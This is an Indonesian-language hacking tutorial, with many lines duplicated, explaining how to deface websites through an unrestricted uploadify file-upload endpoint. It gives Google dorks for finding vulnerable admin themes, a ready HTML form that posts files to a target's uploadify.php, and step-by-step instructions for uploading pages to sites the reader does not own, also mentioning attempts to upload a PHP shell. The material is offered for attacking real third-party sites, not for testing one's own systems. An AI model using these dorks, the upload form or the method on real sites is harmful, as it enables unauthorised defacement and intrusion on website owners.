Cara deface web menggunakan metode uploadify:
siapkan alat perangnya terlebih dahulu:
aplikasi web server
script upload
target
aplikasi web server
script upload
target
untuk aplikasi webservernya silakan cari di playstore banyak, misal untuk yang free:
kWs Webserver
dan lain lain
kWs Webserver
dan lain lain
install aplikasi webservernya.
jalankan dan pasang file-file yang dibutuhkan untuk aplikasi webserver tersebut.
jalankan dan pasang file-file yang dibutuhkan untuk aplikasi webserver tersebut.
dork:
inurl:/themes/ziceadmin
inurl:/themes/zicepanel
inurl:/themes/ziceadmin
inurl:/themes/zicepanel
cari di google dengan dork diatas.
cari targetnya yang vuln, jika sudah dapat targetnya lanjut kebawah.
cari targetnya yang vuln, jika sudah dapat targetnya lanjut kebawah.
file upload.html:
<form action="http://targetnya.com/…/z…/components/uploadify/uploadify.php" method="post" enctype="multipart/form-data"><label for="file">Filename:</label><input type="file" name="Filedata" ><br><input type="submit" name="submit" value="Submit"></form>
<form action="http://targetnya.com/…/z…/components/uploadify/uploadify.php" method="post" enctype="multipart/form-data"><label for="file">Filename:</label><input type="file" name="Filedata" ><br><input type="submit" name="submit" value="Submit"></form>
copy script diatas dan paste ke sebuah file bernama: upload.html
save dan pindah ke dalam folder root dari aplikasi web servernya, dan jalankan webservernya.
kalau sudah diroot, jalankan dengan port 80 di pengaturan aplikasinya, atau default 8080.
save dan pindah ke dalam folder root dari aplikasi web servernya, dan jalankan webservernya.
kalau sudah diroot, jalankan dengan port 80 di pengaturan aplikasinya, atau default 8080.
ganti targetnya.com dengan alamat situs target.
jika sudah, buka aplikasi browser seperti chrome dan tulis di address barnya:
http://localhost:8080/upload.html
http://localhost:8080/upload.html
cari file yang ingin di upload, misal file bernama: test.html yang berisi:
<h1>TEST OK</h1>
<h1>TEST OK</h1>
lalu klik submit/upload dan tunggu hingga berhasil.
nah, kalo berhasil nanti akan ada tulisan acak tampil di browser yang dipakai.
misal: /iYaoqnOajqpsjaoacakH.html
copy tulisan acak tadi beserta extensi filenya, disini yang diupload adalah file html, jadi extensinya akan menjadi html.
setelah dicopy, paste hingga menjadi seperti ini di address barnya:
http://target.com/iYaoqnOajqpsjaoacakH.html
copy tulisan acak tadi beserta extensi filenya, disini yang diupload adalah file html, jadi extensinya akan menjadi html.
setelah dicopy, paste hingga menjadi seperti ini di address barnya:
http://target.com/iYaoqnOajqpsjaoacakH.html
dan bila berhasil, maka akan tampil hasil file test.html tadi yaitu TEST OK.
Note:
metode uploadify bisa mengupload file jenis php dan yang lainnya tapi ketika di akses maka akan muncul halaman bahwa file tersebut tidak dapat di akses/dijalankan.
jadi kita tdk bisa menjalankan shell kita walaupun shell tersebut sudah berhasil diupload.
metode uploadify bisa mengupload file jenis php dan yang lainnya tapi ketika di akses maka akan muncul halaman bahwa file tersebut tidak dapat di akses/dijalankan.
jadi kita tdk bisa menjalankan shell kita walaupun shell tersebut sudah berhasil diupload.
#cheers~ #FA2AS
EmoticonEmoticon